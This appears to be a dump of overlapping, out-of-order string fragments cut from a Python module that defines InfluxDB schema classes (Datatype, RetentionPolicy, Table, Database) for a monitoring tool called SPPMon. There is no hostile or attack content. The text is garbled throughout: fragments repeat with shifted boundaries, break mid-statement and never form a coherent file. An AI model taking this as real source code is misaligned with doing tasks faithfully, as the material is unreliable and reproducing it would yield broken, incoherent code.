dict.fromkeys(self.tags,", "the keys fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None) tags: Dict[str,", "value or `NONE`. \"\"\" for enum in Datatype: if(enum is", "init method. Attributes name - name of the database tables", "the types within the enum is important: bool is a", "Important: Only use for Epoch timestamps, not duration or counter.", "be escaped within a measurement/table name\"\"\" def __init__(self, database: Database,", "of tags and fields mydict {Dict[str, Any]} -- dict with", "shard_duration self.__default = default try: # str due usage of", "name def __str__(self) -> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) ->", "def __str__(self) -> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) -> str:", ": Removed to avoid death-circle on repeated queries. fields[key] =", "split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[ Dict[str, Any], Dict[str, Any],", "# escape not allowed characters in Measurement for bad_character in", "all database and table structures used for the influx database.", "{Dict[str, Any]} -- dict with colums as keys. None-Values are", "all columns for table {self.name} are declared: {key}\") # before", "return self.__name def __getitem__(self, table_name: str) -> Table: \"\"\"Aquire a", "def time_key(self) -> str: \"\"\"name of the timestamp key\"\"\" return", "Influx-Types. By declaring the type SPPMon will automatically insert the", "name: str, fields: Dict[str, Datatype] = None, tags: List[str] =", "policy it is declared afer which ammount of time a", "of predefined time names if(key in time_stamp_field or key in", "Value to be analyzed Returns: Datatype -- type of value", "int, None] = None for (key, value) in mydict.items(): #", "retention policy default setting for creation\") self.__name = name self.__database", "a placeholder.\"\"\" STRING = str \"\"\"Special symbols and \\\" will", "not a bool. Important: only use `TIME` for epoch timestamps,", "= name def __str__(self) -> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self)", "with colums as keys. None-Values are ignored Raises: ValueError: If", "function uses the tag/field and timestamp definiton declared within this", "in time_stamp_field): continue else: ExceptionUtils.error_message(f\"Not all columns for table {self.name}", "if it was not defined. []-Access. Arguments: table_name {str} --", "[]-Access. Arguments: table_name {str} -- name of the table you", "table_name: str) -> Table: \"\"\"Aquire a instance of a predefined", "Only use for Epoch timestamps, not duration or counter. Caution:", "self.__replication = replication self.__shard_duration = shard_duration self.__default = default try:", "value. Default Influx numeric data type. Mixing with ints works.\"\"\"", "are declared: {key}\") # before key+\"MISSING\" : Removed to avoid", "= self.time_key # helper variable to only overwrite if it", "Returns: Datatype -- type of value or `NONE`. \"\"\" for", "self.__database @property def duration(self) -> str: \"\"\"time until the data", "to declare. Fails if the data is mixed with any", "def __init__(self, name: str, database: Database, duration: str, replication: int", "to be analyzed Returns: Datatype -- type of value or", "tags, fields and a timestamp. None-Values and empty strings are", "table_name)) def __str__(self) -> str: return self.name def __repr__(self) ->", "Split the given dict into a pre-defined set of tags,", "timestamp key\"\"\" return self.__time_key @property def name(self) -> str: \"\"\"name", "name = name.replace(bad_character, '\\\\%c'% bad_character) self.__name: str = name def", "at least one value in dict to split\") # if", "name - name of RP database - associated database duration", "mydict): raise ValueError(\"need at least one value in dict to", "transform a timestamp into seconds. Important: Only use for Epoch", "database: Database, name: str, fields: Dict[str, Datatype] = None, tags:", "elif(key in tags): tags[key] = value elif(key in InfluxUtils.time_key_names or", "dict to split\") # if table is not defined use", "Dict[str, Datatype] = fields self.__tags: List[str] = tags self.__time_key: str", "def __hash__(self) -> int: return hash(json.dumps(self.to_dict(), sort_keys=True)) class Table: \"\"\"Represents", "not defined use default split if(not self.fields): return InfluxUtils.default_split(mydict=mydict) #", "__bad_measurement_characters: List[str] = [' ', ','] \"\"\"those chars need to", "is purged\"\"\" return self.__duration @property def replication(self) -> int: \"\"\"How", "Datatype.NONE class RetentionPolicy: \"\"\"Represents a influxdb retention policy. By this", "\"\"\"Any boolean, be aware it is a subtype of int.", "definitions to look up\"\"\" return self.__tables @property def retention_policies(self) ->", "dict\"\"\" return { 'name': self.name, 'duration': self.duration, 'shardGroupDuration': self.__shard_duration, 'replicaN':", "Datatype(Enum): \"\"\" This enum differentiates between the different Influx-Types. By", "replication is always 1\"\"\" return self.__replication @property def shard_duration(self) ->", "not of a big use. Methods: get_auto_datatype - get Datatype", "self.__name @property def retention_policy(self) -> RetentionPolicy: \"\"\"retention policy associated with", "def retention_policy(self) -> RetentionPolicy: \"\"\"retention policy associated with this table\"\"\"", "the timestamp field retention_policy - retention policy associated with this", "error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration for retention policy {name} is not", "be avoided. Only use if no datatype is declared. It", "ValueError: If no dict is given or not of type", "for {value}\") return Datatype.NONE class RetentionPolicy: \"\"\"Represents a influxdb retention", "name self.__database = database self.__replication = replication self.__shard_duration = shard_duration", "type of value or `NONE`. \"\"\" for enum in Datatype:", "self.__fields: Dict[str, Datatype] = fields self.__tags: List[str] = tags self.__time_key:", "\"\"\"get Datatype enum by value typ analysis. Usage should be", "associated with this table database - table is declared within", "Default Influx numeric data type. Mixing with ints works.\"\"\" TIMESTAMP", "the database tables - tables with predefined tags & fields", "except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration for retention policy", "to split\") # if table is not defined use default", "table fields - dict of field name with datatype tags", "Union[str, int, None]]: \"\"\"Split the given dict into a pre-defined", "the tables via name. Creates empty table if missing. \"\"\"", "Policies continuous_queries - Set of all provided Continuous Queries Methods", "to compare to influxdb-created dict\"\"\" return { 'name': self.name, 'duration':", "Datatype] = None, tags: List[str] = None, time_key: str =", "Boolean within Influx. \"\"\" INT = int \"\"\"Appends a 'i'", "not the time_stamp_field time_overwrite_allowed = True # actualy timestamp saved", "bool: \"\"\" whether this is the default RP\"\"\" return self.__default", "memory-groups default - whether this is the default RP Methods", "\"\"\"Used to create a dict out of the values, able", "timestamp into seconds. Important: Only use for Epoch timestamps, not", "skips time-type and fails if ints are mixed with floats.", "return InfluxUtils.default_split(mydict=mydict) # fill dicts # table.fields is a dict,", "to take\"\"\" return self.__shard_duration @property def default(self) -> bool: \"\"\"", "fields): fields = {} if(not tags): tags = [] if(not", "get_auto_datatype(value: Any) -> Datatype: \"\"\"get Datatype enum by value typ", "class Datatype(Enum): \"\"\" This enum differentiates between the different Influx-Types.", "str = 'time', retention_policy: RetentionPolicy = None) -> None: if(not", "= value elif(key in InfluxUtils.time_key_names or key in time_stamp_field): continue", "of all provided Retention Policies\"\"\" return self.__retention_policies @property def continuous_queries(self)", "default: bool = False) -> None: if(not name): raise ValueError(\"need", "able to compare to influxdb-created dict\"\"\" return { 'name': self.name,", "also used as reference\"\"\" return self.__name def __getitem__(self, table_name: str)", "Dict[str, Datatype]: \"\"\"fields of the table, name is key, value", "-> bool: \"\"\" whether this is the default RP\"\"\" return", "Methods to_dict - creates a dict out of the values", "__str__(self) -> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) -> str: return", "Tuple of: tags, fields, timestamp \"\"\" if(not mydict): raise ValueError(\"need", "from typing import Any, Dict, List, Set, Tuple, Union import", "ignored Raises: ValueError: If no dict is given or not", "RetentionPolicy)): return o.to_dict() == self.to_dict() return False def __hash__(self) ->", "`TIME` is automatically converted into second format. Note: The return", "predefined time names if(key in time_stamp_field or key in InfluxUtils.time_key_names):", "afer which ammount of time a dataset is deleted from", "in InfluxUtils.time_key_names or key in time_stamp_field): continue else: ExceptionUtils.error_message(f\"Not all", "creates a dict out of the values \"\"\" @property def", "@property def fields(self) -> Dict[str, Datatype]: \"\"\"fields of the table,", "-- Value to be analyzed Returns: Datatype -- type of", "InfluxUtils.time_key_names): # sppmonCTS has lowest priority, only set if otherwise", "# time_stamp_field is highest priority. Do not overwrite it. elif(key", "is automatically converted into second format. Note: The return type", "the date is replicated shard_duration - Size of memory-groups default", "Datatype Database Table RetentionPolicy \"\"\" from __future__ import annotations from", "default RP Methods to_dict - creates a dict out of", "# if table is not defined use default split if(not", "or counts. `TIME` is automatically converted into second format. Note:", "bool, None]} -- Value to be analyzed Returns: Datatype --", "def default(self) -> bool: \"\"\" whether this is the default", "name - name of the database tables - tables with", "durations or counts. `TIME` is automatically converted into second format.", "def replication(self) -> int: \"\"\"How often the date is replicated.", "bool is a int, but a int is not a", "the correct time format\") try: # str due usage of", "Usage should be avoided. Only use if no datatype is", "of the values \"\"\" @property def name(self) -> str: \"\"\"name", "-> Tuple[ Dict[str, Any], Dict[str, Any], Union[str, int, None]]: \"\"\"Split", "of RP database - associated database duration - time until", "are ignored Raises: ValueError: If no dict is given or", "Table with predefined set of tags and fields mydict {Dict[str,", "Default time is 0s, then the db decides what to", "\"\"\" for enum in Datatype: if(enum is Datatype.TIMESTAMP): continue if(isinstance(value,", "declared within this database\"\"\" return self.__database __bad_measurement_characters: List[str] = ['", "the database, also used as reference\"\"\" return self.__name def __getitem__(self,", "str: return f\"Table: {self.name}\" def split_by_table_def(self, mydict: Dict[str, Any]) ->", "in the correct time format\") try: # str due usage", "policy {name} is not in the correct time format\") try:", "Dict[str, Any], Union[str, int, None]]: \"\"\"Split the given dict into", "is not in the correct time format\") try: # str", "with any other type.\"\"\" FLOAT = float \"\"\"Unchanged value. Default", "table {self.name} are declared: {key}\") # before key+\"MISSING\" : Removed", "is None or (isinstance(value, str) and not value)): continue #", "table\") if(not time_key): raise ValueError(\"time key cannot be None\") if(not", "dict with colums as keys. None-Values are ignored Raises: ValueError:", "time_overwrite_allowed = True # actualy timestamp saved time_stamp: Union[str, int,", "table_name {str} -- name of the table you want to", "if(time_stamp is None and key == SppUtils.capture_time_key): time_stamp = value", "= time_key self.__retention_policy = retention_policy # escape not allowed characters", "until the data is purged replication - How often the", "is key, value is datatype\"\"\" return self.__fields @property def tags(self)", "self.time_key # helper variable to only overwrite if it is", "Dict[str, Datatype] = None, tags: List[str] = None, time_key: str", "self.__database = database self.__replication = replication self.__shard_duration = shard_duration self.__default", "in Datatype: if(enum is Datatype.TIMESTAMP): continue if(isinstance(value, enum.value)): return enum", "= None for (key, value) in mydict.items(): # Ignore empty", "is replicated. We only have 1 db instance so replication", "return o.to_dict() == self.to_dict() return False def __hash__(self) -> int:", "== SppUtils.capture_time_key): time_stamp = value # time_stamp_field is highest priority.", "if(not duration): raise ValueError(\"need retention policy duration for creation\") if(not", "\"\"\"fields of the table, name is key, value is datatype\"\"\"", "create table\") if(not name): raise ValueError(\"need str name to create", "from enum import Enum, unique import re import json from", "@property def retention_policy(self) -> RetentionPolicy: \"\"\"retention policy associated with this", "is declared. It skips time-type and fails if ints are", "It skips time-type and fails if ints are mixed with", "sppmonCaptureTime or others elif(time_overwrite_allowed): time_stamp = value # if no", "different Influx-Types. By declaring the type SPPMon will automatically insert", "-> str: return f\"Retention Policy: {self.name}\" def __eq__(self, o: object)", "enum ExceptionUtils.error_message(f\"No auto type found for {value}\") return Datatype.NONE class", "- dict of field name with datatype tags - tags", "a 'i' at end of number to declare. Fails if", "only use as a placeholder.\"\"\" STRING = str \"\"\"Special symbols", "0s, then the db decides what to take\"\"\" return self.__shard_duration", "time_stamp = value # if time_stamp_field is not used yet,", "be escaped.\"\"\" BOOL = bool \"\"\"Any boolean, be aware it", "name for creation\") if(not database): raise ValueError(\"need retention policy database", "second format. Note: The return type is just a helper", "check for Keys or Fields if(key in fields): fields[key] =", "with predefined tags & fields retention_policies - Set of all", "raise ValueError(f\"shard duration for retention policy {name} is not in", "but a int is not a bool. Important: only use", "# str due usage of method self.__duration: str = InfluxUtils.transform_time_literal(duration,", "are mixed with floats. If no type is detected emits", "replication - How often the date is replicated shard_duration -", "this database Methods split_by_table_def - Split the given dict into", "Database, name: str, fields: Dict[str, Datatype] = None, tags: List[str]", "duration for creation\") if(default is None): raise ValueError(\"need retention policy", "for creation\") if(not duration): raise ValueError(\"need retention policy duration for", "value elif(key in tags): tags[key] = value elif(key in InfluxUtils.time_key_names", "\"\"\"Set of all provided Retention Policies\"\"\" return self.__retention_policies @property def", "set of tags, fields and a timestamp. \"\"\" @property def", "provided Continuous Queries\"\"\" return self.__continuous_queries @property def name(self) -> str:", "else: continue # Otherwise check for Keys or Fields if(key", "often the date is replicated. We only have 1 db", "use `TIME` for epoch timestamps, *NOT* for durations or counts.", "only set if otherwise None if(time_stamp is None and key", "in Measurement for bad_character in self.__bad_measurement_characters: if(re.search(bad_character, name)): name =", "return self.__shard_duration @property def default(self) -> bool: \"\"\" whether this", "int: \"\"\"How often the date is replicated. We only have", "due usage of method self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except", "= \"0s\", default: bool = False) -> None: if(not name):", "RP\"\"\" return self.__default def __init__(self, name: str, database: Database, duration:", "from utils.execption_utils import ExceptionUtils from utils.influx_utils import InfluxUtils from utils.spp_utils", "into a pre-defined set of tags, fields and a timestamp.", "of influx database. Define all table definitions within the init", "otherwise new empty table \"\"\" return self.tables.get(table_name, Table(self, table_name)) def", "tags): tags[key] = value elif(key in InfluxUtils.time_key_names or key in", "before key+\"MISSING\" : Removed to avoid death-circle on repeated queries.", "within a measurement/table name\"\"\" def __init__(self, database: Database, name: str,", "datatype tags - tags as list of str time_key -", "database: Database, duration: str, replication: int = 1, shard_duration: str", "floats. If no type is detected emits a warning and", "given or not of type dict. Returns: (Dict[str, Any], Dict[str,", "in mydict.items(): # Ignore empty entrys if(value is None or", "1\"\"\" return self.__replication @property def shard_duration(self) -> str: \"\"\"Size of", "it matches any of predefined time names if(key in time_stamp_field", "type(None) \"\"\"Undeclared, only use as a placeholder.\"\"\" STRING = str", "into second format. Note: The return type is just a", "duration(self) -> str: \"\"\"time until the data is purged\"\"\" return", "', ','] \"\"\"those chars need to be escaped within a", "-> str: \"\"\"name of the table\"\"\" return self.__name @property def", "return type is just a helper and not of a", "{str} -- name of the table you want to aquire", "str due usage of method self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False)", "not duration or counter. Caution: Type is just a placeholder,", "- name of the database tables - tables with predefined", "ValueError(\"need database to create table\") if(not name): raise ValueError(\"need str", "self.__name: str = name self.__tables: Dict[str, Table] = {} self.__retention_policies:", "data type. Mixing with ints works.\"\"\" TIMESTAMP = type(int) \"\"\"Automatic", "of memory-groups default - whether this is the default RP", "-- name of the table you want to aquire Returns:", "retention_policy - retention policy associated with this table database -", "with predefined set of tags and fields mydict {Dict[str, Any]}", "If no dict is given or not of type dict.", "within this table. Arguments: self {Table} -- Table with predefined", "__getitem__(self, table_name: str) -> Table: \"\"\"Aquire a instance of a", "mydict {Dict[str, Any]} -- dict with colums as keys. None-Values", "raise ValueError(\"need retention policy duration for creation\") if(not replication): raise", "Any]} -- dict with colums as keys. None-Values are ignored", "should be recorded as time time_stamp_field = self.time_key # helper", "take\"\"\" return self.__shard_duration @property def default(self) -> bool: \"\"\" whether", "re import json from typing import Any, Dict, List, Set,", "{self.name}' def __init__(self, name: str): self.__name: str = name self.__tables:", "self.name def __repr__(self) -> str: return f'Database: {self.name}' def __init__(self,", "for enum in Datatype: if(enum is Datatype.TIMESTAMP): continue if(isinstance(value, enum.value)):", "return self.__default def __init__(self, name: str, database: Database, duration: str,", "raise ValueError(\"need str name to create table\") if(not time_key): raise", "within the enum is important: bool is a int, but", "format. The order of the types within the enum is", "empty entrys if(value is None or (isinstance(value, str) and not", "mixed with any other type.\"\"\" FLOAT = float \"\"\"Unchanged value.", "Dict, List, Set, Tuple, Union import influx.influx_queries as Queries from", "a timestamp into seconds. Important: Only use for Epoch timestamps,", "Methods: get_auto_datatype - get Datatype enum by value typ analysis", "Dict[str, Any], Dict[str, Any], Union[str, int, None]]: \"\"\"Split the given", "db instance so replication is always 1\"\"\" return self.__replication @property", "purged\"\"\" return self.__duration @property def replication(self) -> int: \"\"\"How often", "otherwise None if(time_stamp is None and key == SppUtils.capture_time_key): time_stamp", "Policies\"\"\" return self.__retention_policies @property def continuous_queries(self) -> Set[Queries.ContinuousQuery]: \"\"\"Set of", "name. Creates empty table if missing. \"\"\" @property def tables(self)", "Note: The return type is just a helper and not", "@property def default(self) -> bool: \"\"\" whether this is the", "key cannot be None\") if(not fields): fields = {} if(not", "database to create table\") if(not name): raise ValueError(\"need str name", "# helper variable to only overwrite if it is not", "helper variable to only overwrite if it is not the", "tags, fields and a timestamp. \"\"\" @property def fields(self) ->", "Creates empty table if missing. \"\"\" @property def tables(self) ->", "utils.influx_utils import InfluxUtils from utils.spp_utils import SppUtils @unique class Datatype(Enum):", "and \\\" will be escaped.\"\"\" BOOL = bool \"\"\"Any boolean,", "or Fields if(key in fields): fields[key] = value elif(key in", "if(re.search(bad_character, name)): name = name.replace(bad_character, '\\\\%c'% bad_character) self.__name: str =", "or others elif(time_overwrite_allowed): time_stamp = value # if no overwrite", "Datatype enum by value typ analysis. Usage should be avoided.", "= False time_stamp = value # if time_stamp_field is not", "{name} is not in the correct time format\") try: #", "tags: Dict[str, Any] = dict.fromkeys(self.tags, None) # what field should", "is time_stamp_field): time_overwrite_allowed: bool = False time_stamp = value #", "subtype of int. TODO Untested, saves as Boolean within Influx.", "Database: \"\"\"table is declared within this database\"\"\" return self.__database __bad_measurement_characters:", "# fill dicts # table.fields is a dict, we only", "RetentionPolicy \"\"\" from __future__ import annotations from enum import Enum,", "__init__(self, name: str, database: Database, duration: str, replication: int =", "return self.__retention_policy @property def database(self) -> Database: \"\"\"table is declared", "Any, Dict, List, Set, Tuple, Union import influx.influx_queries as Queries", "to_dict(self) -> Dict[str, Union[str, int, bool]]: \"\"\"Used to create a", "Undeclared collums will produce a warning. This function uses the", "'\\\\%c'% bad_character) self.__name: str = name def __str__(self) -> str:", "data is purged replication - How often the date is", "f\"{self.database.name}.{self.name}\" def __repr__(self) -> str: return f\"Retention Policy: {self.name}\" def", "1, shard_duration: str = \"0s\", default: bool = False) ->", "replication factor for creation\") if(not shard_duration): raise ValueError(\"need retention policy", "import InfluxUtils from utils.spp_utils import SppUtils @unique class Datatype(Enum): \"\"\"", "return self.__tags @property def time_key(self) -> str: \"\"\"name of the", "escaped.\"\"\" BOOL = bool \"\"\"Any boolean, be aware it is", "sort_keys=True)) class Table: \"\"\"Represents a measurement in influx. Contains pre-defined", "Policy: {self.name}\" def __eq__(self, o: object) -> bool: if(isinstance(o, RetentionPolicy)):", "for table {self.name} are declared: {key}\") # before key+\"MISSING\" :", "If no type is detected emits a warning and returns", "set of tags and fields mydict {Dict[str, Any]} -- dict", "-> str: return self.name def __repr__(self) -> str: return f'Database:", "empty table \"\"\" return self.tables.get(table_name, Table(self, table_name)) def __str__(self) ->", "int, None]]: \"\"\"Split the given dict into a pre-defined set", "SppUtils.capture_time_key): time_stamp = value # time_stamp_field is highest priority. Do", "{self.name} are declared: {key}\") # before key+\"MISSING\" : Removed to", "influx. Contains pre-defined tag and field definitions. Attributes name -", "uses the tag/field and timestamp definiton declared within this table.", "of int. TODO Untested, saves as Boolean within Influx. \"\"\"", "ValueError(\"need retention policy database for creation\") if(not duration): raise ValueError(\"need", "predefined table, returns a empty table if it was not", "Dict[str, Table] = {} self.__retention_policies: Set[RetentionPolicy] = set() self.__continuous_queries: Set[Queries.ContinuousQuery]", "`NONE`. \"\"\" for enum in Datatype: if(enum is Datatype.TIMESTAMP): continue", "symbols and \\\" will be escaped.\"\"\" BOOL = bool \"\"\"Any", "other type.\"\"\" FLOAT = float \"\"\"Unchanged value. Default Influx numeric", "create a dict out of the values, able to compare", "duration - time until the data is purged replication -", "pre-defined set of tags, fields and a timestamp. None-Values and", "value in dict to split\") # if table is not", "Dict[str, Any], int) -- Tuple of: tags, fields, timestamp \"\"\"", "# table.fields is a dict, we only need the keys", "(key, value) in mydict.items(): # Ignore empty entrys if(value is", "only need the keys fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None)", "value # time_stamp_field is highest priority. Do not overwrite it.", "return self.__duration @property def replication(self) -> int: \"\"\"How often the", "value typ analysis. Usage should be avoided. Only use if", "Datatype]: \"\"\"fields of the table, name is key, value is", "How often the date is replicated shard_duration - Size of", "table definitions within the init method. Attributes name - name", "-- dict with colums as keys. None-Values are ignored Raises:", "-> str: \"\"\"time until the data is purged\"\"\" return self.__duration", "look up\"\"\" return self.__tables @property def retention_policies(self) -> Set[RetentionPolicy]: \"\"\"Set", "auto type found for {value}\") return Datatype.NONE class RetentionPolicy: \"\"\"Represents", "often the date is replicated shard_duration - Size of memory-groups", "int = 1, shard_duration: str = \"0s\", default: bool =", "'i' at end of number to declare. Fails if the", "replication: int = 1, shard_duration: str = \"0s\", default: bool", "of the values, able to compare to influxdb-created dict\"\"\" return", "is given or not of type dict. Returns: (Dict[str, Any],", "predefined tags & fields retention_policies - Set of all provided", "bad_character) self.__name: str = name def __str__(self) -> str: return", "Measurement for bad_character in self.__bad_measurement_characters: if(re.search(bad_character, name)): name = name.replace(bad_character,", "of: tags, fields, timestamp \"\"\" if(not mydict): raise ValueError(\"need at", "Methods split_by_table_def - Split the given dict into a pre-defined", "- tables with predefined tags & fields retention_policies - Set", "fields and a timestamp. None-Values and empty strings are ignored.", "and a timestamp. \"\"\" @property def fields(self) -> Dict[str, Datatype]:", "\"\"\"Represents a measurement in influx. Contains pre-defined tag and field", "retention_policies - Set of all provided Retention Policies continuous_queries -", "continue if(isinstance(value, enum.value)): return enum ExceptionUtils.error_message(f\"No auto type found for", "any other type.\"\"\" FLOAT = float \"\"\"Unchanged value. Default Influx", "= None) -> None: if(not database): raise ValueError(\"need database to", "return f\"Retention Policy: {self.name}\" def __eq__(self, o: object) -> bool:", "= 1, shard_duration: str = \"0s\", default: bool = False)", "utils.spp_utils import SppUtils @unique class Datatype(Enum): \"\"\" This enum differentiates", "Define all table definitions within the init method. Attributes name", "you want to aquire Returns: Table -- Instance of a", "all provided Retention Policies\"\"\" return self.__retention_policies @property def continuous_queries(self) ->", "-> str: return f\"{self.database.name}.{self.name}\" def __repr__(self) -> str: return f\"Retention", "time_stamp = value # time_stamp_field is highest priority. Do not", "try: # str due usage of method self.__shard_duration: str =", "False def __hash__(self) -> int: return hash(json.dumps(self.to_dict(), sort_keys=True)) class Table:", "try: # str due usage of method self.__duration: str =", "for Keys or Fields if(key in fields): fields[key] = value", "ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration for retention policy {name}", "as list of str time_key - key name of the", "between the different Influx-Types. By declaring the type SPPMon will", "\"\"\"Undeclared, only use as a placeholder.\"\"\" STRING = str \"\"\"Special", "retention_policies(self) -> Set[RetentionPolicy]: \"\"\"Set of all provided Retention Policies\"\"\" return", "class RetentionPolicy: \"\"\"Represents a influxdb retention policy. By this policy", "in the right format. The order of the types within", "Datatype -- type of value or `NONE`. \"\"\" for enum", "Retention Policies\"\"\" return self.__retention_policies @property def continuous_queries(self) -> Set[Queries.ContinuousQuery]: \"\"\"Set", "InfluxUtils.transform_time_literal(duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration for", "of a predefined table, returns a empty table if it", "float, int, bool, None]} -- Value to be analyzed Returns:", "- name of RP database - associated database duration -", "The order of the types within the enum is important:", "\"\"\"associated database\"\"\" return self.__database @property def duration(self) -> str: \"\"\"time", "table structures used for the influx database. Classes: Datatype Database", "ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"shard duration for retention policy", "deleted from the DB. Attributes name - name of RP", "method. Attributes name - name of the database tables -", "and fails if ints are mixed with floats. If no", "end of number to declare. Fails if the data is", "of the table, name is key, value is datatype\"\"\" return", "-> Database: \"\"\"table is declared within this database\"\"\" return self.__database", "None-Values are ignored Raises: ValueError: If no dict is given", "retention_policy: RetentionPolicy = None) -> None: if(not database): raise ValueError(\"need", "[] if(not retention_policy): retention_policy = next(filter(lambda rp: rp.default, database.retention_policies)) self.__database:", "fields, timestamp \"\"\" if(not mydict): raise ValueError(\"need at least one", "reference\"\"\" return self.__name def __getitem__(self, table_name: str) -> Table: \"\"\"Aquire", "Datatype: \"\"\"get Datatype enum by value typ analysis. Usage should", "tables - tables with predefined tags & fields retention_policies -", "name: str, database: Database, duration: str, replication: int = 1,", "as reference\"\"\" return self.__name def __getitem__(self, table_name: str) -> Table:", "def database(self) -> Database: \"\"\"associated database\"\"\" return self.__database @property def", "type dict. Returns: (Dict[str, Any], Dict[str, Any], int) -- Tuple", "and key == SppUtils.capture_time_key): time_stamp = value # time_stamp_field is", "\"\"\"table is declared within this database\"\"\" return self.__database __bad_measurement_characters: List[str]", "not in the correct time format\") def to_dict(self) -> Dict[str,", "as time time_stamp_field = self.time_key # helper variable to only", "\"\"\"Provides all database and table structures used for the influx", "a big use. Methods: get_auto_datatype - get Datatype enum by", "\"\"\"Split the given dict into a pre-defined set of tags,", "bool: if(isinstance(o, RetentionPolicy)): return o.to_dict() == self.to_dict() return False def", "with ints works.\"\"\" TIMESTAMP = type(int) \"\"\"Automatic transform a timestamp", "\"\"\"Dict with table definitions to look up\"\"\" return self.__tables @property", "-> str: \"\"\"name of the Retention Policy\"\"\" return self.__name @property", "def __init__(self, database: Database, name: str, fields: Dict[str, Datatype] =", "str \"\"\"Special symbols and \\\" will be escaped.\"\"\" BOOL =", "def tags(self) -> List[str]: \"\"\"tags of the table, datatype always", "= InfluxUtils.transform_time_literal(duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration", "escaped within a measurement/table name\"\"\" def __init__(self, database: Database, name:", "f'Database: {self.name}' def __init__(self, name: str): self.__name: str = name", "creation\") if(not duration): raise ValueError(\"need retention policy duration for creation\")", "for creation\") if(not shard_duration): raise ValueError(\"need retention policy shard duration", "-> None: if(not database): raise ValueError(\"need database to create table\")", "provided Continuous Queries Methods __getitem__ - [] access on the", "in dict to split\") # if table is not defined", "time format\") def to_dict(self) -> Dict[str, Union[str, int, bool]]: \"\"\"Used", "= name self.__tables: Dict[str, Table] = {} self.__retention_policies: Set[RetentionPolicy] =", "this database\"\"\" return self.__database __bad_measurement_characters: List[str] = [' ', ',']", "tables with predefined tags & fields retention_policies - Set of", "self.__tags: List[str] = tags self.__time_key: str = time_key self.__retention_policy =", "not overwrite it. elif(key is time_stamp_field): time_overwrite_allowed: bool = False", "str: \"\"\"time until the data is purged\"\"\" return self.__duration @property", "matches any of predefined time names if(key in time_stamp_field or", "a instance of a predefined table, returns a empty table", "self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error)", "value is datatype\"\"\" return self.__fields @property def tags(self) -> List[str]:", "table. Arguments: self {Table} -- Table with predefined set of", "if missing. \"\"\" @property def tables(self) -> Dict[str, Table]: \"\"\"Dict", "used yet, overwrite sppmonCaptureTime or others elif(time_overwrite_allowed): time_stamp = value", "database self.__fields: Dict[str, Datatype] = fields self.__tags: List[str] = tags", "typing import Any, Dict, List, Set, Tuple, Union import influx.influx_queries", "@property def name(self) -> str: \"\"\"name of the table\"\"\" return", "in self.__bad_measurement_characters: if(re.search(bad_character, name)): name = name.replace(bad_character, '\\\\%c'% bad_character) self.__name:", "fields declared, it will split by a default pattern. Undeclared", "None if(time_stamp is None and key == SppUtils.capture_time_key): time_stamp =", "retention policy replication factor for creation\") if(not shard_duration): raise ValueError(\"need", "number to declare. Fails if the data is mixed with", "\"\"\"name of the Retention Policy\"\"\" return self.__name @property def database(self)", "str name to create table\") if(not time_key): raise ValueError(\"time key", "if(enum is Datatype.TIMESTAMP): continue if(isinstance(value, enum.value)): return enum ExceptionUtils.error_message(f\"No auto", "compare to influxdb-created dict\"\"\" return { 'name': self.name, 'duration': self.duration,", "@property def replication(self) -> int: \"\"\"How often the date is", "a predefined table, returns a empty table if it was", "overwrite if it is not the time_stamp_field time_overwrite_allowed = True", "measurement in influx. Contains pre-defined tag and field definitions. Attributes", "tag and field definitions. Attributes name - name of table", "database tables - tables with predefined tags & fields retention_policies", "- [] access on the tables via name. Creates empty", "= database self.__replication = replication self.__shard_duration = shard_duration self.__default =", "Tuple, Union import influx.influx_queries as Queries from utils.execption_utils import ExceptionUtils", "self {Table} -- Table with predefined set of tags and", "\\\" will be escaped.\"\"\" BOOL = bool \"\"\"Any boolean, be", "Union[str, int, None] = None for (key, value) in mydict.items():", "structures used for the influx database. Classes: Datatype Database Table", "FLOAT = float \"\"\"Unchanged value. Default Influx numeric data type.", "what to take\"\"\" return self.__shard_duration @property def default(self) -> bool:", "policy duration for creation\") if(not replication): raise ValueError(\"need retention policy", "the data in the right format. The order of the", "of a predefined table, otherwise new empty table \"\"\" return", "return f\"Table: {self.name}\" def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[", "the db decides what to take\"\"\" return self.__shard_duration @property def", "By this policy it is declared afer which ammount of", "as error: ExceptionUtils.exception_info(error) raise ValueError(f\"shard duration for retention policy {name}", "the correct time format\") def to_dict(self) -> Dict[str, Union[str, int,", "works.\"\"\" TIMESTAMP = type(int) \"\"\"Automatic transform a timestamp into seconds.", "fails if ints are mixed with floats. If no type", "enum import Enum, unique import re import json from typing", "declared, it will split by a default pattern. Undeclared collums", "ValueError(\"need retention policy name for creation\") if(not database): raise ValueError(\"need", "if(key in fields): fields[key] = value elif(key in tags): tags[key]", "avoided. Only use if no datatype is declared. It skips", "of number to declare. Fails if the data is mixed", "if(default is None): raise ValueError(\"need retention policy default setting for", "keys. None-Values are ignored Raises: ValueError: If no dict is", "class Table: \"\"\"Represents a measurement in influx. Contains pre-defined tag", "= name self.__database = database self.__replication = replication self.__shard_duration =", "elif(time_overwrite_allowed): time_stamp = value # if no overwrite allowed, continue", "boolean, be aware it is a subtype of int. TODO", "to_dict - creates a dict out of the values \"\"\"", "dicts # table.fields is a dict, we only need the", "None) # what field should be recorded as time time_stamp_field", "== self.to_dict() return False def __hash__(self) -> int: return hash(json.dumps(self.to_dict(),", "database. Define all table definitions within the init method. Attributes", "others elif(time_overwrite_allowed): time_stamp = value # if no overwrite allowed,", "database, also used as reference\"\"\" return self.__name def __getitem__(self, table_name:", "self.__retention_policy @property def database(self) -> Database: 